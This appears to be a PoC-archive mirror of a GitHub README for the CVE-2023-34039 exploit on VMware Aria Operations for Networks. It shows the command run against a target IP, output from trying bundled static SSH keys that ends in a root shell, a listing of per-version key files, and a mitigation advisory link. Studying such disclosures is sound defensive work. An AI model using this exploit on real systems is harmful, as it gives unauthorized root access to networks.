Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-34039 PoC — VMware Aria Operations 加密问题漏洞

Source
https://github.com/CharonDefalt/CVE-2023-34039
Associated Vulnerability
Title:VMware Aria Operations 加密问题漏洞 (CVE-2023-34039)
Description:Aria Operations for Networks contains an Authentication Bypass vulnerability due to a lack of unique cryptographic key generation. A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI.
Description
VMware exploit
Readme
# CVE-2023-34039
POC for CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE

## Technical Analysis
A root cause analysis of the vulnerability can be found on my blog:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

![poc](poc.gif)


## Summary
VMWare Aria Operations for Networks (vRealize Network Insight) from version 6.0 to 6.10 did not regenerate the ssh keys for the `support` and `ubuntu` users, allowing an attacker with SSH access to gain `root` shell access to this product.

This issue was reported to VMWare by <a style="text-decoration: none" href="https://twitter.com/rootxharsh" target="_blank">Harsh Jaiswal (@rootxharsh)</a>
and <a style="text-decoration: none" href="https://twitter.com/iamnoooob" target="_blank">Rahul Maini (@iamnoooob)</a> at <a style="text-decoration: none" href="https://twitter.com/pdiscoveryio" target="_blank">ProjectDiscovery Research</a>

I just wrote the exploit, if you can call it that, cause it's basically a ssh command wrapper.

## Usage
```plaintext
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform

(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform


********************************** ATTENTION **********************************
 NTP Service is not healthy.
 IMPACT: It may affect the proper working of other services.
 ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~# 

```

## Mitigations
Update to the latest version or mitigate by following the instructions within the Progress Advisory
* https://www.vmware.com/security/advisories/VMSA-2023-0018.html

## Follow Us on for the more security research:
*  [SinSinology](https://twitter.com/SinSinology)
*  [SummoningTeam](https://twitter.com/SummoningTeam)

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
File Snapshot

 [4.0K]  /data/pocs/8575bdddb886360c740ee06efae03645aad82f7b
├── [1.6K]  CVE-2023-34039.py
├── [4.0K]  keys
│   ├── [4.0K]  vrni-6.0.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.0.0_platform
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.0.0_proxy
│   ├── [4.0K]  vrni-6.1.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.1.0_platform
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.1.0_proxy
│   ├── [4.0K]  vrni-6.10.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.10.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.10.0_platform
│   ├── [4.0K]  vrni-6.2.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.2.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.2.0_platform
│   ├── [4.0K]  vrni-6.3.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.3.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.3.0_platform
│   ├── [4.0K]  vrni-6.4.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.4.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.4.0_platform
│   ├── [4.0K]  vrni-6.5.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.5.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.5.0_platform
│   ├── [4.0K]  vrni-6.6.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.6.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.6.0_platform
│   ├── [4.0K]  vrni-6.7.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.7.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.7.0_platform
│   ├── [4.0K]  vrni-6.8.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.8.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.8.0_platform
│   └── [4.0K]  vrni-6.9.0
│       ├── [1.6K]  id_rsa_vnera_keypair_6.9.0_collector
│       └── [1.6K]  id_rsa_vnera_keypair_6.9.0_platform
├── [ 98K]  poc.gif
└── [2.7K]  README.md

12 directories, 25 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →